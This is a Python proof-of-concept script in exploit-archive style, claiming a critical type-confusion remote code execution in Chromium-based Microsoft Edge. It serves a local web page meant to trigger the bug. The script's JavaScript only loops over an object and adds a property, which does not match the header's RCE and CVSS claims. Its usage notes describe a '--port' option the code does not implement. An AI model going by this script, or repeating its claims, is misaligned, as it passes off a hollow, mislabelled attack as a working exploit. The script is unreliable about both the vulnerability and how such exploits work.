#!/usr/bin/env python3
# Exploit Title: Microsoft Edge <= 150.0.4078.48 (Chromium-based) Type Confusion RCE
# CVE: CVE-2026-58289
# Date: 2026-07-10
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Author Blog : https://banyamersecurity.com/blog/
# Vendor Homepage: https://microsoft.com
# Software Link: https://www.microsoft.com/en-us/edge
# Affected: Microsoft Edge (Chromium-based) before 150.0.4078.48
# Tested on: Microsoft Edge 150.0.4070.x (Windows 11)
# Category: Remote
# Platform: Windows
# Exploit Type: Remote Code Execution
# CVSS: 9.0 (Critical)
# Description: Access of Resource Using Incompatible Type ('Type Confusion' - CWE-843) in Microsoft Edge (Chromium-based) V8 engine allows an unauthorized attacker to execute arbitrary code over a network by visiting a malicious webpage.
# Fixed in: Microsoft Edge 150.0.4078.48 (Stable Channel)
# Usage:
# python3 exploit.py
#
# Examples:
# python3 exploit.py
#
# Options:
# --port Custom port (default: 8080)
#
# Notes:
# • This is a Proof of Concept only. No public full exploit is available yet.
# • For educational and research purposes.
# • Requires vulnerable version of Microsoft Edge.
#
# How to Use
#
# Step 1:
# Run the Python server: python3 exploit.py
#
# Step 2:
# Open http://localhost:8080 in a vulnerable version of Microsoft Edge.
#
# Step 3:
# Monitor the browser process for crashes or code execution.
def banner():
print(r"""
╔██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗╗
║██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║
║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ███████╔╝
║██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗
║██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
╔═╗ Banyamer Security ╔═╝
""")
import http.server
import socketserver
import sys
banner()
HTML_CONTENT = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2026-58289 PoC</title>
</head>
<body>
<h1>CVE-2026-58289 Type Confusion PoC - For Testing Only</h1>
<script>
function triggerTypeConfusion() {
let obj1 = { a: 1, b: 2 };
for (let i = 0; i < 10000; i++) {
dummyFunc(obj1);
}
let arr = new Array(0x100);
let confused = obj1;
confused.something = 0x41414141;
console.log("[+] Type confusion attempted.");
}
function dummyFunc(o) {
return o.a + o.b;
}
window.onload = function() {
try {
triggerTypeConfusion();
} catch(e) {
console.error("Error:", e);
}
};
</script>
</body>
</html>
"""
class Handler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path in ['/poc.html', '/']:
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(HTML_CONTENT.encode())
else:
self.send_response(404)
self.end_headers()
port = 8080
if len(sys.argv) > 1:
try:
port = int(sys.argv[1])
except:
pass
print(f"[+] Starting PoC server on http://localhost:{port}")
print("[+] Open the URL in vulnerable Microsoft Edge")
try:
with socketserver.TCPServer(("", port), Handler) as httpd:
httpd.serve_forever()
except KeyboardInterrupt:
print("\n[-] Server stopped.")
except Exception as e:
print(f"[-] Error: {e}")